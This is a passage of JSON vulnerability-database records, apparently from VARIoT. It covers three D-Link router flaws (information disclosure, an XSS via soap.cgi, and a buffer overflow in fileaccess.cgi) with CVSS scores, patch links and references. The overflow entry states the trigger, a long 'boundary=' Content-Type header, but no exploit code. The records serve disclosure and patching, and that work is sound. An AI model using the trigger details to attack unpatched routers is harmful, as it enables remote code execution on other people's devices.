"id": "SAP10146",
"trust": 1.6
},
{
"db": "DLINK",
"id": "SAP10147",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014085",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-04703",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202001-005",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-04703"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014085"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-005"
},
{
"db": "NVD",
"id": "CVE-2019-20213"
}
]
},
"id": "VAR-202001-0381",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-04703"
}
],
"trust": 1.2588377259999999
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-04703"
}
]
},
"last_update_date": "2024-11-23T21:59:32.178000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP10146",
"trust": 0.8,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10146"
},
{
"title": "SAP10147",
"trust": 0.8,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10147"
},
{
"title": "Patch for D-Link DIR-859 Information Disclosure Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/200127"
},
{
"title": "D-Link DIR-859 Repair measures for information disclosure vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=108253"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-04703"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014085"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-005"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-74",
"trust": 1.0
},
{
"problemtype": "CWE-863",
"trust": 1.0
},
{
"problemtype": "CWE-200",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-014085"
},
{
"db": "NVD",
"id": "CVE-2019-20213"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20213"
},
{
"trust": 1.6,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10146"
},
{
"trust": 1.6,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10147"
},
{
"trust": 1.0,
"url": "https://medium.com/%40s1kr10s/d-link-dir-859-unauthenticated-information-disclosure-en-faf1a9a13f3f"
},
{
"trust": 1.0,
"url": "https://medium.com/%40s1kr10s/d-link-dir-859-unauthenticated-information-disclosure-es-6540f7f55b03"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-20213"
},
{
"trust": 0.6,
"url": "https://medium.com/@s1kr10s/d"
},
{
"trust": 0.6,
"url": "https://medium.com/@s1kr10s/d-link-dir-859-unauthenticated-information-disclosure-en-faf1a9a13f3f"
},
{
"trust": 0.6,
"url": "https://medium.com/@s1kr10s/d-link-dir-859-unauthenticated-information-disclosure-es-6540f7f55b03"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-04703"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014085"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-005"
},
{
"db": "NVD",
"id": "CVE-2019-20213"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-04703"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014085"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-005"
},
{
"db": "NVD",
"id": "CVE-2019-20213"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-02-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-04703"
},
{
"date": "2020-01-31T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-014085"
},
{
"date": "2020-01-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202001-005"
},
{
"date": "2020-01-02T14:16:36.533000",
"db": "NVD",
"id": "CVE-2019-20213"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-02-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-04703"
},
{
"date": "2020-01-31T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-014085"
},
{
"date": "2020-01-03T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202001-005"
},
{
"date": "2024-11-21T04:38:13.213000",
"db": "NVD",
"id": "CVE-2019-20213"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-859 Router Information Disclosure Vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-014085"
}
],
"trust": 0.8
}
}
var-201803-1767
Vulnerability from variot
XSS vulnerability in htdocs/webinc/body/bsc_sms_send.php in D-Link DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-865L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to read a cookie via a crafted receiver parameter to soap.cgi. D-Link DIR-868L , DIR-865L ,and DIR-860L Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. D-LinkDIR-868L and others are all wireless router products of D-Link. A cross-site scripting vulnerability exists in the htdocs/webinc/body/bsc_sms_send.php file in D-LinkDIR-868L, DIR-865L, and DIR-860L. D-Link DIR-868L, etc. The following products and versions are affected: D-Link DIR-868L DIR868LA1_FW112b04 and earlier; DIR-865L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and earlier; DIR-860L DIR860LA1_FW110b04 and earlier
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201803-1767",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-865l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "reva_firmware_patch_1.08.b01"
},
{
"model": "dir-868l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "a1_fw112b04"
},
{
"model": "dir-860l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "a1_fw110b04"
},
{
"model": "dir-860l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "dir860la1_fw110b04"
},
{
"model": "dir-865l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "dir-865l_reva_firmware_patch_1.08.b01"
},
{
"model": "dir-868l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "dir868la1_fw112b04"
},
{
"model": "dir-868l \u003c=dir868la1 fw112b04",
"scope": null,
"trust": 0.6,
"vendor": "345 217 213 350 256 257 347 247 221 346 212 200",
"version": null
},
{
"model": "dir-865l \u003c=dir-865l reva patch 1.08.b01",
"scope": null,
"trust": 0.6,
"vendor": "345 217 213 350 256 257 347 247 221 346 212 200",
"version": null
},
{
"model": "dir-860l \u003c=dir860la1 fw110b04",
"scope": null,
"trust": 0.6,
"vendor": "345 217 213 350 256 257 347 247 221 346 212 200",
"version": null
},
{
"model": "dir-860l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "a1_fw110b04"
},
{
"model": "dir-865l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "reva_firmware_patch_1.08.b01"
},
{
"model": "dir-868l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "a1_fw112b04"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06629"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002679"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-151"
},
{
"db": "NVD",
"id": "CVE-2018-6528"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:d-link:dir-860l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-865l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-868l_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-002679"
}
]
},
"cve": "CVE-2018-6528",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2018-6528",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2018-06629",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-136560",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2018-6528",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2018-6528",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-6528",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2018-6528",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2018-06629",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201803-151",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-136560",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06629"
},
{
"db": "VULHUB",
"id": "VHN-136560"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002679"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-151"
},
{
"db": "NVD",
"id": "CVE-2018-6528"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS vulnerability in htdocs/webinc/body/bsc_sms_send.php in D-Link DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-865L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to read a cookie via a crafted receiver parameter to soap.cgi. D-Link DIR-868L , DIR-865L ,and DIR-860L Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. D-LinkDIR-868L and others are all wireless router products of D-Link. A cross-site scripting vulnerability exists in the htdocs/webinc/body/bsc_sms_send.php file in D-LinkDIR-868L, DIR-865L, and DIR-860L. D-Link DIR-868L, etc. The following products and versions are affected: D-Link DIR-868L DIR868LA1_FW112b04 and earlier; DIR-865L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and earlier; DIR-860L DIR860LA1_FW110b04 and earlier",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-6528"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002679"
},
{
"db": "CNVD",
"id": "CNVD-2018-06629"
},
{
"db": "VULHUB",
"id": "VHN-136560"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-6528",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002679",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201803-151",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-06629",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-136560",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06629"
},
{
"db": "VULHUB",
"id": "VHN-136560"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002679"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-151"
},
{
"db": "NVD",
"id": "CVE-2018-6528"
}
]
},
"id": "VAR-201803-1767",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06629"
},
{
"db": "VULHUB",
"id": "VHN-136560"
}
],
"trust": 1.5752999514285713
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06629"
}
]
},
"last_update_date": "2024-11-23T21:39:30.505000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "DIR-860L Firmware Patch Notes",
"trust": 0.8,
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdf"
},
{
"title": "DIR-865L Firmware Patch Notes",
"trust": 0.8,
"url": "ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-865L/REVA/DIR-865L_REVA_FIRMWARE_PATCH_NOTES_1.10B01_EN_WW.pdf"
},
{
"title": "DIR-868L Firmware Patch Notes",
"trust": 0.8,
"url": "ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdf"
},
{
"title": "Patch for D-LinkDIR Series Cross-Site Scripting Vulnerability (CVE-2018-6528)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/124013"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06629"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002679"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-136560"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002679"
},
{
"db": "NVD",
"id": "CVE-2018-6528"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.3,
"url": "https://github.com/thebeeman/pwning-multiple-dlink-router-via-soap-proto"
},
{
"trust": 1.1,
"url": "ftp://ftp2.dlink.com/security_advisements/dir-860l/reva/dir-860l_reva_firmware_patch_notes_1.11b01_en_ww.pdf"
},
{
"trust": 1.1,
"url": "ftp://ftp2.dlink.com/security_advisements/dir-868l/reva/dir-868l_reva_firmware_patch_notes_1.20b01_en_ww.pdf"
},
{
"trust": 1.1,
"url": "ftp://ftp2.dlink.com/security_advisements/dir-865l/reva/dir-865l_reva_firmware_patch_notes_1.10b01_en_ww.pdf"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-6528"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-6528"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06629"
},
{
"db": "VULHUB",
"id": "VHN-136560"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002679"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-151"
},
{
"db": "NVD",
"id": "CVE-2018-6528"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-06629"
},
{
"db": "VULHUB",
"id": "VHN-136560"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002679"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-151"
},
{
"db": "NVD",
"id": "CVE-2018-6528"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-06629"
},
{
"date": "2018-03-06T00:00:00",
"db": "VULHUB",
"id": "VHN-136560"
},
{
"date": "2018-04-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-002679"
},
{
"date": "2018-03-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201803-151"
},
{
"date": "2018-03-06T20:29:00.843000",
"db": "NVD",
"id": "CVE-2018-6528"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-06629"
},
{
"date": "2018-03-27T00:00:00",
"db": "VULHUB",
"id": "VHN-136560"
},
{
"date": "2018-04-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-002679"
},
{
"date": "2023-04-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201803-151"
},
{
"date": "2024-11-21T04:10:50.380000",
"db": "NVD",
"id": "CVE-2018-6528"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201803-151"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural D-Link Product cross-site scripting vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-002679"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201803-151"
}
],
"trust": 0.6
}
}
var-201910-1472
Vulnerability from variot
Certain D-Link products are affected by: Buffer Overflow. This affects DIR-880L 1.08B04 and DIR-895 L/R 1.13b03. The impact is: execute arbitrary code (remote). The component is: htdocs/fileaccess.cgi. The attack vector is: A crafted HTTP request handled by fileacces.cgi could allow an attacker to mount a ROP attack: if the HTTP header field CONTENT_TYPE starts with ''boundary=' followed by more than 256 characters, a buffer overflow would be triggered, potentially causing code execution. plural D-Link The product contains a classic buffer overflow vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-Link DIR-880L is a wireless AC1900 dual-band Gigabit cloud router. D-Link DIR-895 L / R is an AC5300 Wi-Fi tri-band router.
A buffer overflow vulnerability exists in the htdocs / fileaccess.cgi component in D-Link DIR-880L 1.08B04 and DIR-895 L / R 1.13b03. An attacker could use this vulnerability to execute arbitrary code through a specially crafted HTTP request
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201910-1472",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-868l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dir-880l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b04"
},
{
"model": "dir-895r",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.13b03"
},
{
"model": "dir-890l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dir-895l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.13b03"
},
{
"model": "dir-885l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dir-868l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-880l",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "1.08b04"
},
{
"model": "dir-885l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-890l",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-895l",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "1.13b03"
},
{
"model": "dir-895r",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "1.13b03"
},
{
"model": "dir-880l 1.08b04",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-895 l/r 1.13b03",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39553"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014768"
},
{
"db": "NVD",
"id": "CVE-2017-14948"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:d-link:dir-868l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-880l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-885l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-890l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-895l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dir-895r_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014768"
}
]
},
